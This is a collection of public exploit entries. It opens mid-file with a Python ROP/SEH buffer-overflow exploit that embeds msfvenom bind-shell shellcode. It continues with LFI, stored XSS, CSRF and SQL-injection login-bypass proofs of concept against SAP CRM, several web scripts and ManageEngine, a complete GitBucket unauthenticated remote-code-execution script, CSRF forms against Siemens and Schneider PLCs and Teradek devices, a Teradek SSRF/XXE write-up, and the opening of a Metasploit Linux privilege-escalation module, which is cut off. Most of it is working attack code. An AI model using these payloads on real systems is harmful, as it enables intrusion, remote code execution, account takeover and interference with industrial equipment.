0x10037bc0, # POP EDX # RETN [SkinMagic.dll]
0xffffffff, #
0x10035a07, # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+8] # RETN [SkinMagic.dll]
0x10037654, # POP EAX # RETN [SkinMagic.dll]
0xa141dffb, #
0x100317c8, # ADD EAX,5EFFC883 # RETN [SkinMagic.dll] Gets us to #0x0041a87e # ADD EDX,EBX # POP EBX # RETN 0x10 [Easy MPEG to DVD Burner.exe]
0x1003248d, # PUSH EAX # RETN [SkinMagic.dll] | Calls #0x0041a87e # ADD EDX,EBX # POP EBX # RETN 0x10 [Easy MPEG to DVD Burner.exe]
0x41414141, # FILLER
0x1003993e, # PUSH EDX # ADD AL,5F # POP ESI # POP EBX # RETN 0x0C [SkinMagic.dll]
0x41414141, # FILLER
0x41414141, # FILLER
0x41414141, # FILLER
0x41414141, # FILLER
0x41414141, # FILLER
#***END VirtualAlloc() to ESI***
#***START 0x40 to ECX***
0x100185fb, # XOR EAX,EAX # RETN [SkinMagic.dll]
0x41414141, # FILLER
0x41414141, # FILLER
0x41414141, # FILLER
0x10037c5b, # ADD EAX,40 # POP EBP # RETN [SkinMagic.dll]
0x41414141, # FILLER
0x10032176, # XCHG EAX,ECX # ADD EAX,20835910 # ADD BYTE PTR DS:[ECX+10059130],AH # MOV DWORD PTR DS:[1005912C],EAX # RETN [SkinMagic.dll]
#***END 0x40 to ECX***
#***START 0x1000 to EDX***
0x10032993, # POP EBX # RETN [SkinMagic.dll]
0xaaaaaaaa, #
0x10037bc0, # POP EDX # RETN [SkinMagic.dll]
0x55556556, #
0x10037654, # POP EAX # RETN [SkinMagic.dll]
0xa141dffb, #
0x100317c8, # ADD EAX,5EFFC883 # RETN [SkinMagic.dll] Gets us to #0x0041a87e # ADD EDX,EBX # POP EBX # RETN 0x10 [Easy MPEG to DVD Burner.exe]
0x1003248d, # PUSH EAX # RETN [SkinMagic.dll] | Calls #0x0041a87e # ADD EDX,EBX # POP EBX # RETN 0x10 [Easy MPEG to DVD Burner.exe]
0x41414141, # FILLER
#***END 0x1000 to EDX***
#*** Start EBP = ReturnTo (stack pivot into a rop nop / jmp esp)***
0x1002829d, # POP EBP # RETN [SkinMagic.dll]
0x41414141, # FILLER
0x41414141, # FILLER
0x41414141, # FILLER
0x41414141, # FILLER
0x100284f8, # {pivot 16 / 0x10} : # ADD ESP,0C # POP EBP # RETN [SkinMagic.dll]
#*** END EBP = ReturnTo (stack pivot into a rop nop / jmp esp)***
#***START 0x1 to EBX***
0x10032993, # POP EBX # RETN [SkinMagic.dll]
0xffffffff, #
0x10037bd3, # INC EBX # FPATAN # RETN [SkinMagic.dll]
0x10037bd3, # INC EBX # FPATAN # RETN [SkinMagic.dll]
#***END 0x1 to EBX***
#***START ROP NOP to EDI***
0x100342f0, # POP EDI # RETN [SkinMagic.dll]
0x10032158, # RETN (ROP NOP) [SkinMagic.dll]
#***END ROP NOP to EDI***
#***START Gadgets to execute PUSHAD / Execute VirtualAlloc()***
0x10037654, # POP EAX # RETN [SkinMagic.dll]
0xa140acd2, # CONSTANT
0x100317c8, # ADD EAX,5EFFC883 # RETN [SkinMagic.dll] (Puts location of a PUSHAD into EAX "0x00407555", # PUSHAD # RETN [Easy MPEG to DVD Burner.exe]
0x1003248d, # PUSH EAX # RETN [SkinMagic.dll] | Calls #0x00407555, # PUSHAD # RETN [Easy MPEG to DVD Burner.exe]
#***END Gadgets to execute PUSHAD***
#***After Return from VirtualAlloc() / stack pivot land in ROP NOP Sled / jmp ESP --> Execute Shellcode***
0x10032158, # RETN (ROP NOP) [SkinMagic.dll]
0x10032158, # RETN (ROP NOP) [SkinMagic.dll]
0x10032158, # RETN (ROP NOP) [SkinMagic.dll]
0x10032158, # RETN (ROP NOP) [SkinMagic.dll]
0x1001cc57, # & push esp # ret [SkinMagic.dll]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
nop_rop_chain_1 = "\xbd\xdd\x02\x10" * 18 # 0x1002ddbd : {pivot 12 / 0x0c} : # ADD ESP,0C # RETN [SkinMagic.dll]
nop_rop_chain_2 = "\x58\x21\x03\x10" * 22 # RETN (ROP NOP) [SkinMagic.dll]
seh = "\x06\x4e\x40" # 0x00404e06 : {stack pivot 1928 / 0x788} (Lands us into rop nop chain --> rop_chain) : # POP EDI # POP ESI # POP EBP # MOV DWORD PTR FS:[0],ECX # POP EBX # ADD ESP,778 # RETN [Easy MPEG to DVD Burner.exe]
nop = "\x90" * 20
#Max Space Avaliable for Shellcode = 600 bytes
#------------------------------------------------------------------------------------#
# msfvenom -p windows/shell_bind_tcp LPORT=4444 -b '\x00\x0a\x0d' -f py -v shellcode #
# x86/shikata_ga_nai succeeded with size 355 (iteration=0) #
#------------------------------------------------------------------------------------#
shellcode = ""
shellcode += "\xb8\x50\x08\x0f\xf2\xd9\xe9\xd9\x74\x24\xf4\x5b"
shellcode += "\x29\xc9\xb1\x53\x31\x43\x12\x03\x43\x12\x83\x93"
shellcode += "\x0c\xed\x07\xef\xe5\x73\xe7\x0f\xf6\x13\x61\xea"
shellcode += "\xc7\x13\x15\x7f\x77\xa4\x5d\x2d\x74\x4f\x33\xc5"
shellcode += "\x0f\x3d\x9c\xea\xb8\x88\xfa\xc5\x39\xa0\x3f\x44"
shellcode += "\xba\xbb\x13\xa6\x83\x73\x66\xa7\xc4\x6e\x8b\xf5"
shellcode += "\x9d\xe5\x3e\xe9\xaa\xb0\x82\x82\xe1\x55\x83\x77"
shellcode += "\xb1\x54\xa2\x26\xc9\x0e\x64\xc9\x1e\x3b\x2d\xd1"
shellcode += "\x43\x06\xe7\x6a\xb7\xfc\xf6\xba\x89\xfd\x55\x83"
shellcode += "\x25\x0c\xa7\xc4\x82\xef\xd2\x3c\xf1\x92\xe4\xfb"
shellcode += "\x8b\x48\x60\x1f\x2b\x1a\xd2\xfb\xcd\xcf\x85\x88"
shellcode += "\xc2\xa4\xc2\xd6\xc6\x3b\x06\x6d\xf2\xb0\xa9\xa1"
shellcode += "\x72\x82\x8d\x65\xde\x50\xaf\x3c\xba\x37\xd0\x5e"
shellcode += "\x65\xe7\x74\x15\x88\xfc\x04\x74\xc5\x31\x25\x86"
shellcode += "\x15\x5e\x3e\xf5\x27\xc1\x94\x91\x0b\x8a\x32\x66"
shellcode += "\x6b\xa1\x83\xf8\x92\x4a\xf4\xd1\x50\x1e\xa4\x49"
shellcode += "\x70\x1f\x2f\x89\x7d\xca\xda\x81\xd8\xa5\xf8\x6c"
shellcode += "\x9a\x15\xbd\xde\x73\x7c\x32\x01\x63\x7f\x98\x2a"
shellcode += "\x0c\x82\x23\x45\x91\x0b\xc5\x0f\x39\x5a\x5d\xa7"
shellcode += "\xfb\xb9\x56\x50\x03\xe8\xce\xf6\x4c\xfa\xc9\xf9"
shellcode += "\x4c\x28\x7e\x6d\xc7\x3f\xba\x8c\xd8\x15\xea\xd9"
shellcode += "\x4f\xe3\x7b\xa8\xee\xf4\x51\x5a\x92\x67\x3e\x9a"
shellcode += "\xdd\x9b\xe9\xcd\x8a\x6a\xe0\x9b\x26\xd4\x5a\xb9"
shellcode += "\xba\x80\xa5\x79\x61\x71\x2b\x80\xe4\xcd\x0f\x92"
shellcode += "\x30\xcd\x0b\xc6\xec\x98\xc5\xb0\x4a\x73\xa4\x6a"
shellcode += "\x05\x28\x6e\xfa\xd0\x02\xb1\x7c\xdd\x4e\x47\x60"
shellcode += "\x6c\x27\x1e\x9f\x41\xaf\x96\xd8\xbf\x4f\x58\x33"
shellcode += "\x04\x7f\x13\x19\x2d\xe8\xfa\xc8\x6f\x75\xfd\x27"
shellcode += "\xb3\x80\x7e\xcd\x4c\x77\x9e\xa4\x49\x33\x18\x55"
shellcode += "\x20\x2c\xcd\x59\x97\x4d\xc4"
exploit = nop_rop_chain_1 + nop_rop_chain_2 + rop_chain + nop + shellcode + "\x41" * (1012-len(nop_rop_chain_1)-len(nop_rop_chain_2)-len(rop_chain)-len(nop)-len(shellcode)) + seh
f = open ("Exploit.txt", "w")
f.write(exploit)
f.close()
# Title: SAP B2B / B2C CRM 2.x < 4.x - Local File Inclusion
# Application:SAP B2B OR B2C is CRM
# Versions Affected: SAP B2B OR B2C is CRM 2.x 3.x and 4.x with Bakend R/3 (to icss_b2b)
# Vendor URL: http://SAP.com
# Bugs: SAP LFI in B2B OR B2C CRM
# Sent: 2018-05-03
# Reported: 2018-05-03
# Date of Public Advisory: 2018-02-09
# Reference: SAP Security Note 1870255656
# Author: Richard Alviarez
# 1. VULNERABLE PACKAGES
# SAP LFI in B2B OR B2C CRM v2.x to 4.x
# Other versions are probably affected too, but they were not checked.
# 2. TECHNICAL DESCRIPTION
# A possible attacker can take advantage of this vulnerability
# to obtain confidential information of the platform,
# as well as the possibility of writing in the logs of the
# registry in order to get remote execution of commands and take control of the system.
# 3. Steps to exploit this vulnerability
A. Open
https://SAP/{name}_b2b/initProductCatalog.do?forwardPath=/WEB-INF/web.xml
Other vulnerable parameters:
https://SAP/{name}_b2b/CatalogClean.do?forwardPath=/WEB-INF/web.xml
https://SAP/{name}_b2b/IbaseSearchClean.do?forwardPath=/WEB-INF/web.xml
https://SAP/{name}_b2b/ForwardDynamic.do?forwardPath=/WEB-INF/web.xml
page on SAP server
B. Change parameter {name} for example icss_b2b or other name....
C. Change "/WEB-INF/web.xml" for other files or archives internal.
# 4. Collaborators
# - CuriositySec
# - aDoN90
# - Vis0r
# Exploit Title: Private Message PHP Script 2.0 - Persistent Cross-Site scripting
# Date: 2018-05-20
# Exploit Author: Borna nematzadeh (L0RD)
# Vendor Homepage: https://codecanyon.net/item/private-message-php-script/21027192?s_rank=1
# Version: 2.0
# Tested on: Windows
# Description :
Private Message PHP Script 2.0 suffers from persistent cross site scripting.
You can put your malicious javascript payload .
When target opens your massege , payload will be executed before self destruction .
# POC :
1) Put this payload into textarea and click submit :
</textarea><script>alert(document.cookie)</script>
2) You will get a link which your javascript code is inside this link . You can send this link to anyone .
3) After clicking on "show me the message" , payload will be executed .
# Exploit Title: Superfood - Restaurants & Online Food Order System 1.0 - Persistent cross site scripting / Cross site request forgery / Admin panel Authentication bypass
# Date: 2018-05-20
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
# Vendor Homepage: https://codecanyon.net/item/superfood-restaurants-online-food-order-system/16855836?s_rank=30
# Version: 1.0
# Tested on: Kali linux
====================================================
# Description:
Superfood - Restaurants & Online Food Order System 1.0 suffers from multiple vulnerabilities :
====================================================
# POC 1 : Persistent cross site scripting :
1) After creating an account , go to your profile.
2) Navigate to "Update profile" and put this payload :
"/><script>alert('xss')</script>
3) You will have an alert box in the page .
====================================================
# POC 2 : CSRF :
Attacker can change user's authentication directly :
# User's CSRF exploit :
<html>
<head>
<title>CSRF POC</title>
</head>
<body>
<form action="http://restaurant.thesoftking.com/updateprofile"
method="post">
<input type="hidden" name="name" value="anything">
<input type="hidden" name="mobile" value="1000000000">
<input type="hidden" name="address" value="anything">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
# Admin page CSRF exploit :
<form action="http://restaurant.thesoftking.com/admin/setgeneral.php"
method="post">
<input name="name" value="exploit" type="hidden">
<input name="wcmsg" value="test" type="hidden">
<input name="address" value="test2" type="hidden">
<input name="mobile" value="1000000" type="hidden">
<input name="email" value="test@test.com" type="hidden">
<input name="currency" value="decode" type="hidden">
</form>
<script>
document.forms[0].submit();
</script>
====================================================
# POC 3 : Authentication bypass :
# Attacker can bypass admin panel without any authentication :
Path : /admin
Username : ' or 0=0 #
Password : anything
====================================================
# Exploit Title: ManageEngine Recovery Manager Plus 5.3 (Build 5330) - Persistent Cross-Site Scripting
# Dated: 2018-03-31
# Exploit Author: Ahmet GÜREL
# Software Link: https://www.manageengine.com/ad-recovery-manager/
# Version: < = 5.3 (Build 5330)
# Platform: Java
# Tested on: Windows
# CVE: CVE-2018-9163
# 1. DETAILS
# In the Add New Technician (s) section on the /admin/technicians page of the
# ManageEngine Recovery Manager Plus 5.3 (Build 5330) application, allows
# remote authenticated users with the Login Name parameter is vulnerable to
# XSS. The parameters entered are written in the database and affect all
# users.
# 2. PoC:
# From the Add New Technician (s) page, it is possible to inject malicious
# web code inside Login Name parameter. The HTTP request looks like the following:
GET
/technicianAction.do?req={%22domainId%22:0,%22loginName%22:%22%3Csvg%20onload%3Dprompt(document.domain)%3E%22,%22password%22:%22Test123%22,%22isDomainUser%22:false,%22roleId%22:1,%22operation%22:%22createTechnicians%22}
HTTP/1.1
Host: 172.16.219.168:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:59.0)
Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://172.16.219.168:8090/
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Cookie: JSESSIONIDRMP=64556C394C0687AA34179CFE2EF4EA5A;
JSESSIONIDSSO=0605E8EB825B181A4A201542A518457D
Connection: close
# Exploit Title: Zenar Content Management System - Cross-Site Scripting
# Software Link: https://zenar.io/
# Dork: N/A
# Author: Berk Dusunur
# Tested Website: http://demo.zenar.io
# Date: 2018-05-20
# Category: Web App
# PoC
# GET Request:
POST /zenario/ajax.php?method_call=refreshPlugin&inIframe=true HTTP/1.1
Host: demo.zenar.io
Cache-Control: no-cache
Connection: Keep-Alive
Accept: text/plain, */*; q=0.01
Origin: http://demo.zenar.io
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://demo.zenar.io/enquiries/newsletter-sign-up
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Cookie: PHPSESSID=27pdf3fd0plfnarmh5edk5es33
Accept-Encoding: gzip, deflate
Content-Length: 273
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
cID=25&slideId=3&cType=html&slotName=Slot_Main_2&instanceId=143&containerId=plgslt_Slot_Main_2&formPageHash=35263a7d5401cb22f77e67fb50fcdd99&reloaded=1&inFullScreen=3&field_14=netsparker%40example.com¤t_page='"--></style></scRipt><scRipt>alert(EZK)</scRipt>
# Response:
<input type="hidden" name="formPageHash"
value="35263a7d5401cb22f77e67fb50fcdd99"/><input type="hidden"
name="reloaded" value="1"/><input type="hidden" name="inFullScreen"
value="1"/><fieldset
id="plgslt_Slot_Main_2_page_'"--></style></scRipt><scRipt>alert(EZK)</scRipt>"
class="page_"><div class="form_fields"></div><div
class="form_buttons"><input type="button" value=""
class="next"/></div>
# Exploit Title: Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Persistent cross site scripting / Cross site request forgery
# Date: 2018-05-20
# Dork: N/A
# Exploit Author: borna nematzadeh (L0RD)
# Vendor Homepage: https://www.codegrape.com/item/flippy-damnfacts-viral-fun-facts-sharing-script/3630
# Version: 1.1.0
# Tested on: Kali linux
# POC 1 : Persistent Cross site scripting :
1) After creating an account , navigate to "Edit profile" .
2) Put this payload into the "Birthday" and save changes :
" onmouseover=alert(document.cookie) "
3) You will have an alert box in the page .
# POC 2 : Cross site request forgery :
<html>
<head>
<title>CSRF POC</title>
</head>
<body>
<form action="http://damnfacts.flippydemos.com/submit_profile.php" method="POST">
<input type="hidden" name="sex" value="Male" />
<input type="hidden" name="birthday" value="test" />
<input type="hidden" name="uEmail" value="ninjaassassinbn@yahoo.com" />
<input type="hidden" name="country" value="United States" />
<input type="hidden" name="about" value="test" />
</form>
<script>
document.forms[0].submit();
// profile will be updated successfully.
</script>
</body>
</html>
# Exploit Title: GitBucket 4.23.1 Unauthenticated RCE
# Date: 21-05-2018
# Software Link: https://github.com/gitbucket/gitbucket
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# Category: remote
1. Description
Abusing weak secret token and passing insecure parameter to File function.
2. Proof of Concept
import os
try:
from Crypto.Cipher import Blowfish
except:
print "pip install pycrypto"
os._exit(0)
import binascii
import base64
import urllib2
import urllib
import time
import sys
import pickle
print "GitBucket 4.23.1 Unauthenticated RCE"
print "by Kacper Szurek"
print "https://security.szurek.pl/"
print "Working only when server is installed on Windows"
def PKCS5Padding(string):
byteNum = len(string)
packingLength = 8 - byteNum % 8
appendage = chr(packingLength) * packingLength
return string + appendage
def encrypt(content, key):
content = PKCS5Padding(content)
cipher = Blowfish.new(key, Blowfish.MODE_ECB)
return base64.b64encode(cipher.encrypt(content))
def get_file(git_bucket_url, file, key, expiration_time):
payload = "{} {}".format(expiration_time, file)
authorization = encrypt(payload, key)
url = "{}/git-lfs/aa/bb/{}".format(git_bucket_url, file)
try:
request = urllib2.Request(url)
request.add_header("Authorization", authorization)
result = urllib2.urlopen(request).read()
return result
except Exception, e:
# If payload is correct and file does not exist, we got error 400
if not "Error 500" in e.read():
return 'OK'
def put_file(git_bucket_url, file, key, expiration_time, content):
payload = "{} {}".format(expiration_time, file)
authorization = encrypt(payload, key)
url = "{}/git-lfs/aa/bb/{}".format(git_bucket_url, file)
try:
request = urllib2.Request(url, data=content)
request.add_header("Authorization", authorization)
request.get_method = lambda: 'PUT'
result = urllib2.urlopen(request)
return result.getcode() == 200
except Exception, e:
return None
def send_command(git_bucket_url, command):
try:
result = urllib2.urlopen("{}/exploit?{}".format(git_bucket_url, urllib.urlencode({'command' : command}))).read()
return result
except:
return None
def pickle_key(url, key):
output = open(pickle_path, "wb")
pickle.dump({'url' : url, 'key' : key}, output)
output.close()
print "[+] Key pickled for futher use"
def unpickle_key(url):
if os.path.isfile(pickle_path):
pickled_file = open(pickle_path, "rb")
data = pickle.load(pickled_file)
pickled_file.close()
if data['url'] == url:
return data['key']
return None
if len(sys.argv) != 3:
print "[-] Usage: exploit.py url command"
os._exit(0)
exploit_jar = 'exploit.jar'
url = sys.argv[1]
command = sys.argv[2]
pickle_path = 'gitbucket.pickle'
if url.endswith('/'):
url = url[0:-1]
try:
is_gitbucket = urllib2.urlopen("{}/api/v3/".format(url), timeout=5).read()
except:
is_gitbucket = ""
if not is_gitbucket.startswith('{"rate_limit_url"'):
print "[-] Probably not gitbucket url: {}".format(url)
os._exit(0)
if not os.path.isfile(exploit_jar):
print "[-] Missing exploit file: {}".format(exploit_jar)
os._exit(0)
expiration_time = int(round(time.time() * 1000))+(1000*6000)
print "[+] Set expire time to: {}".format(expiration_time)
print "[+] Start search blowfish key: "
for i in range(0, 10000):
if i % 100 == 0:
print "+",
potential_key = unpickle_key(url)
if potential_key:
print "\n[+] Unpickle key, try it"
else:
potential_key = str(i).zfill(4)
config_path = "non_existing_file"
config_content = get_file(url, config_path, potential_key, expiration_time)
if config_content:
print "\n[+] Found blowfish key: {}".format(potential_key)
print "[+] Config content:\n{}".format(config_content)
exploit_path = "..\..\..\..\plugins\exploit.jar"
f = open(exploit_jar, "rb")
exploit_content = f.read()
f.close()
if put_file(url, exploit_path, potential_key, expiration_time, exploit_content):
print "[+] Wait few second for plugin load"
time.sleep(5)
command_content = send_command(url, "cmd /c {}".format(command))
if command_content:
pickle_key(url, potential_key)
print command_content
else:
print "[-] Cannot execute command"
else:
print "[-] Cannot upload exploit.jar"
os._exit(0)
3. Solution:
Update to version 4.24.1
https://github.com/gitbucket/gitbucket/releases/download/4.24.1/gitbucket.war
# Exploit Title: Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery
# Google Dork: inurl:/Portal/Portal.mwsl
# Date: 2018-05-21
# Exploit Author: t4rkd3vilz, Jameel Nabbo
# Vendor Homepage: https://www.siemens.com/
# Version: SIMATIC S7-1200 CPU family: All versions prior to V4.1.3
# Tested on: Kali Linux
# CVE: CVE-2015- 5698
# 1. Proof of Concept
<form method="POST" action="http://targetIp/CPUCommands">
<input name="PriNav" value="Start">
<input type="submit" value="Go!">
</form>
<!--
Teradek Cube 7.3.6 CSRF Change Password Exploit
Vendor: Teradek, LLC
Product web page: https://www.teradek.com
Affected version: Firmware Version: 7.3.6 (build 26850)
Hardware Version: 1.5
Teradek Firmware Version 7.3.15
Summary: Cube packs world-class video quality into a rugged, portable
chassis for quick IP video deployments at any location. Each encoder
and decoder includes HDMI and 3G-SDI I/O, Ethernet / WiFI connectivity,
and full duplex IFB.
Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.
Tested on: lighttpd/1.4.31
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2018-5464
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5464.php
02.03.2018
-->
<html>
<body>
<form action="http://127.0.0.1/cgi-bin/system.cgi" method="POST">
<input type="hidden" name="command" value="password" />
<input type="hidden" name="pw1" value="P@ssw0rd" />
<input type="hidden" name="pw2" value="P@ssw0rd" />
<input type="hidden" name="user" value="admin" />
<input type="hidden" name="action" value="Change Password" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Teradek VidiU Pro 3.0.3 SSRF Vulnerability
Vendor: Teradek, LLC
Product web page: https://www.teradek.com
Affected version: VidiU, VidiU Mini, VidiU Pro
3.0.3r32136
3.0.2r31225
2.4.10
Summary: The Teradek VidiU gives you the freedom to broadcast live
high definition video directly to the Web without a PC. Whether you're
streaming out of a video switcher or wirelessly from your camera,
VidiU allows you to go live when you want, where you want. VidiU
offers API level integration with the Ustream, YouTube Live and
Livestream platforms, which makes streaming to your channel as
easy as logging into your account.
Desc: A server-side request forgery (SSRF) vulnerability exists in
the VidiU management interface within the RTMP settings and the Wowza
server mode functionality. The application parses user supplied data
in the GET parameters 'url' and 'xml_url' to construct a page request
that loads the configuration for specific service. Since no validation
is carried out on the parameters, an attacker can specify an external
domain and force the application to make a HTTP request to an arbitrary
destination host, including xml data parsing (XXE potential). This can
be used by an external attacker for example to bypass firewalls and
initiate a service and network enumeration on the internal network
through the affected application.
Tested on: lighttpd/1.4.48
lighttpd/1.4.31
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2018-5461
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5461.php
02.03.2018
--
SSRF open port:
---------------
GET /cgi-bin/wowza.cgi?command=read_url&url=zeroscience.mk:443&_=1526243349301 HTTP/1.1
Host: 127.0.0.1:8090
HTTP/1.1 200 OK
Content-Type: application/json
Connection: close
Date: Sun, 13 May 2018 21:42:30 GMT
Server: lighttpd/1.4.31
Content-Length: 31
{"error":"invalid parameters"}
SSRF closed port:
-----------------
GET /cgi-bin/wowza.cgi?command=read_url&url=zeroscience.mk:7777&_=1526243349301 HTTP/1.1
Host: 127.0.0.1:8090
HTTP/1.1 200 OK
Content-Length: 0
Connection: close
Date: Sun, 13 May 2018 21:43:30 GMT
Server: lighttpd/1.4.31
===================================================
SSRF closed port:
-----------------
GET /cgi-bin/system.cgi?command=rtmp&action=rtmp_xml_from_url&xml_url=zeroscience.mk:7777&_=1526244218671 HTTP/1.1
Host: 127.0.0.1:8090
{"result":"error", "error":"Curl error"}
SSRF open port:
---------------
GET /cgi-bin/system.cgi?command=rtmp&action=rtmp_xml_from_url&xml_url=zeroscience.mk:443&_=1526244218671 HTTP/1.1
Host: 127.0.0.1:8090
{"result":"error", "error":"Bad request"}
===================================================
PoC CSRF Blind XXE SSRF OOB:
----------------------------
<html>
<body>
<form action="http://127.0.0.1:8090/cgi-bin/system.cgi">
<input type="hidden" name="command" value="rtmp" />
<input type="hidden" name="action" value="rtmp_xml_from_url" />
<input type="hidden" name="xml_url" value="http://site.tld/xxe.xml" />
<input type="hidden" name="_" value="1526244218671" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
<!--
Teradek VidiU Pro 3.0.3 CSRF Change Password Exploit
Vendor: Teradek, LLC
Product web page: https://www.teradek.com
Affected version: VidiU, VidiU Mini, VidiU Pro
3.0.3 (build 32136)
3.0.2 (build 31225)
2.4.10
Summary: The Teradek VidiU gives you the freedom to broadcast live
high definition video directly to the Web without a PC. Whether you're
streaming out of a video switcher or wirelessly from your camera,
VidiU allows you to go live when you want, where you want. VidiU
offers API level integration with the Ustream, YouTube Live and
Livestream platforms, which makes streaming to your channel as
easy as logging into your account.
Desc: The application interface allows users to perform certain
actions via HTTP requests without performing any validity checks
to verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user visits
a malicious web site.
Tested on: lighttpd/1.4.48
lighttpd/1.4.31
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2018-5460
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5460.php
02.03.2018
-->
<html>
<body>
<form action="http://127.0.0.1:8090/cgi-bin/password.cgi">
<input type="hidden" name="pw1" value="P@ssw0rd" />
<input type="hidden" name="pw2" value="P@ssw0rd" />
<input type="hidden" name="user" value="admin" />
<input type="submit" value="Initiate" />
</form>
</body>
</html>
# Exploit Title: Auto Dealership & Vehicle Showroom WebSys 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin panel Authentication bypass
# Date: 2018-05-21
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
# Vendor Homepage: https://codecanyon.net/item/auto-dealership-vehicle-showroom-websys/17013273?s_rank=28
# Version: 1.0
# Tested on: Kali linux
# Description: Auto Dealership & Vehicle Showroom WebSys 1.0 suffers from multiple vulnerabilities:
# POC 1 : Persistent cross site scripting :
1) After creating an account , go to your profile.
2) Navigate to "Update profile" and put this payload :
"/><script>alert(document.cookie)</script>
3) You will have an alert box in the page .
# POC 2 : CSRF :
# Attacker can change user's authentication directly :
# User's CSRF exploit :
<html>
<head>
<title>CSRF POC</title>
</head>
<body>
<form action="http://vehicle.thesoftking.com/updateprofile" method="post">
<input type="hidden" name="name" value="anything">
<input type="hidden" name="mobile" value="200000">
<input type="hidden" name="address" value="anything">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
# Admin page CSRF exploit :
<form action="http://vehicle.thesoftking.com/admin/setgeneral.php" method="post">
<input name="name" value="test" type="hidden">
<input name="wcmsg" value="test" type="hidden">
<input name="address" value="test2" type="hidden">
<input name="mobile" value="2000000" type="hidden">
<input name="email" value="test@test.com" type="hidden">
<input name="currency" value="decode" type="hidden">
</form>
<script>
document.forms[0].submit();
</script>
# POC 3 : Authentication bypass :
Path : /admin
Username : ' or 0=0 #
Password : anything
# Exploit Title: Schneider Electric PLCs - Cross-Site Request Forgery
# Date: 2018-05-12
# Exploit Author: t4rkd3vilz
# Vendor Homepage: http://www.schneider-electric.com/
# Tested on: Windows
# CVE: CVE-2013-0663
# Version: Schneider Electric Quantum PLC: 140NOE77111, 140NOE77101, 140NWM10000
# Modicon M340 PLC: BMXNOC0401, BMXNOE0100x, BMXNOE011xx
# Premium PLC: TSXETY4103, TSXETY5103, and TSXWMY100
# Category: webapps
<html>
<head>
<title>CSRF POC</title>
</head>
<body>
<form method="get" action="http://TargetIP/secure/embedded/builtin" name="sample" onSubmit="return validateForm()">
<table border="0" cellspacing="0" cellpadding="0" width="300" style="height: 100" bgcolor="#C0C0C0">
<tr>
<td class="inputCell" width="200">
<div align="left">
<h5>Name:</h5>
<script language="javascript" type="text/javascript">
<!--//
paramLang();
switch(getLanguage())
{
default:
document.write("Username :"); break;
}
//-->
</script>
</div>
</td>
<td class="inputCell" width="190">
<input type="text" name="user" size="20">
</td>
</tr>
<tr>
<td class="inputCell" width="200">
<div align="left">&
<h5>Pass:</h5>
<script language="javascript" type="text/javascript">
<!--//
switch(getLanguage())
{
default:
document.write("New password :"); break;
}
//-->
</script>
</div>
</td>
<td class="inputCell" width="190">
<input type="password" name="passwd" size="20">
</td>
</tr>
<tr>
<td class="inputCell" width="200">
<div align="left">
<h5>Verify Pass:</h5>
<script language="javascript" type="text/javascript">
<!--//
switch(getLanguage())
{
default:
document.write("Confirm password :"); break;
}
//-->
</script>
</div>
</td>
<td class="inputCell" width="190">
<input type="password" name="cnfpasswd" size="20">
</td>
</tr>
</table>
<br>
<div align="center">
<script language="javascript" type="text/javascript">
<!--//
switch(getLanguage())
{
default:
document.write('<input type="submit" name="subhttppwd" value="Change Password">'); break;
}
//-->
</script>
<input type="submit" name="subhttppwd" value="Change Password">
</div>
</form>
<br>
</td>
</tr>
<tr>
<td align="center">
<br>
</body>
</html>
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = GreatRanking
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Post::Linux::Kernel
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Reliable Datagram Sockets (RDS) Privilege Escalation',
'Description' => %q{
This module exploits a vulnerability in the rds_page_copy_user function
in net/rds/page.c (RDS) in Linux kernel versions 2.6.30 to 2.6.36-rc8
to execute code as root (CVE-2010-3904).
This module has been tested successfully on Fedora 13 (i686) with
kernel version 2.6.33.3-85.fc13.i686.PAE and Ubuntu 10.04 (x86_64)
with kernel version 2.6.32-21-generic.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Dan Rosenberg', # Discovery and C exploit
'Brendan Coles' # Metasploit
],
'DisclosureDate' => 'Oct 20 2010',
'Platform' => [ 'linux' ],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [[ 'Auto', {} ]],
'Privileged' => true,
'References' =>
[
